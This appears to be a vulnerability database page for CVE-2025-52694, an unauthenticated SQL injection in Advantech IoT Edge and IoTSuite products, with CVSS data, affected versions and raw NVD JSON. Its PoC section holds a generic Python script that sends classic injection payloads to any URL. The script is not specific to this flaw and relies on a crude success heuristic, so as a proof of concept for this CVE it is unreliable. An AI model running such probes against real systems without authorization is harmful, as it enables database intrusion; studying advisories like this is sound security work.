Security Vulnerability Report
CVE-2025-52694 CVSS 10.0 CRITICAL

CVE-2025-52694

Published: 2026-01-12 03:16:07
Last Modified: 2026-01-26 03:15:49
Source: 5f57b9bf-260d-4433-bf07-b6a79e9bb7d4

Description

Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet, potentially affecting data confidentiality, integrity, and availability. Users and administrators of affected product versions are advised to update to the latest versions immediately.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:advantech:iot_edge_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.0.2)
cpe:2.3:a:advantech:iot_edge_windows:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.0.2)
cpe:2.3:a:advantech:iotsuite_growth_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.0.2)
cpe:2.3:a:advantech:iotsuite_saas_composer:*:*:*:*:*:*:*:* - VULNERABLE (versions before 3.4.15)
cpe:2.3:a:advantech:iotsuite_starter_linux_docker:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.0.2)
All versions of the affected products (consult the official advisory for specific version information)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52694 SQL Injection PoC
# Target: Vulnerable service with SQL injection
# Note: Replace TARGET_URL and PARAMETER with actual values
import requests
import sys


def test_sql_injection(url, param_name):
    """Test for SQL injection vulnerability"""
    payloads = [
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' OR '1'='1' /*",
        "admin' --",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--"
    ]
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    print(f"[*] Testing SQL injection on {url}")
    print(f"[*] Parameter: {param_name}")
    for payload in payloads:
        data = {param_name: payload}
        try:
            response = requests.post(url, data=data, headers=headers, timeout=10)
            # Heuristic only: a 200 response whose body lacks the word "error"
            # is reported as a potential hit; confirm manually before concluding
            if 'error' not in response.text.lower() and response.status_code == 200:
                print(f"[+] Potential vulnerability found with payload: {payload}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    print("[-] No obvious SQL injection detected")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <URL> <PARAMETER>")
        sys.exit(1)
    test_sql_injection(sys.argv[1], sys.argv[2])

References

https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/ (Mitigation, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52694", "sourceIdentifier": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "published": "2026-01-12T03:16:07.127", "lastModified": "2026-01-26T03:15:49.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet, potentially affecting data confidentiality, integrity, and availability. Users and administrators of affected product versions are advised to update to the latest versions immediately."}, {"lang": "es", "value": "El éxito en la explotación de la vulnerabilidad de inyección SQL podría permitir a un atacante remoto no autenticado ejecutar comandos SQL arbitrarios en el servicio vulnerable cuando este está expuesto a Internet, lo que podría afectar la confidencialidad, integridad y disponibilidad de los datos. Se recomienda a los usuarios y administradores de las versiones de productos afectadas que actualicen a las últimas versiones de inmediato."}], "metrics": {"cvssMetricV31": [{"source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iot_edge_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "4159F16F-DB7D-4D05-A929-F36F7881DADC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iot_edge_windows:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "BB4631FE-DC5B-45F6-83B2-7747FFB52191"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_growth_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "A072360E-AD26-44B5-A5BB-F3F3E3489964"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_saas_composer:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.15", "matchCriteriaId": "A4BD0911-E8D5-4E1A-BFA4-872A9F62E621"}, {"vulnerable": true, "criteria": "cpe:2.3:a:advantech:iotsuite_starter_linux_docker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.2", "matchCriteriaId": "1B3D90FA-A9D9-4C66-9C28-34E600C984ED"}]}]}], "references": [{"url": "https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "tags": ["Mitigation", "Third Party Advisory"]}]}}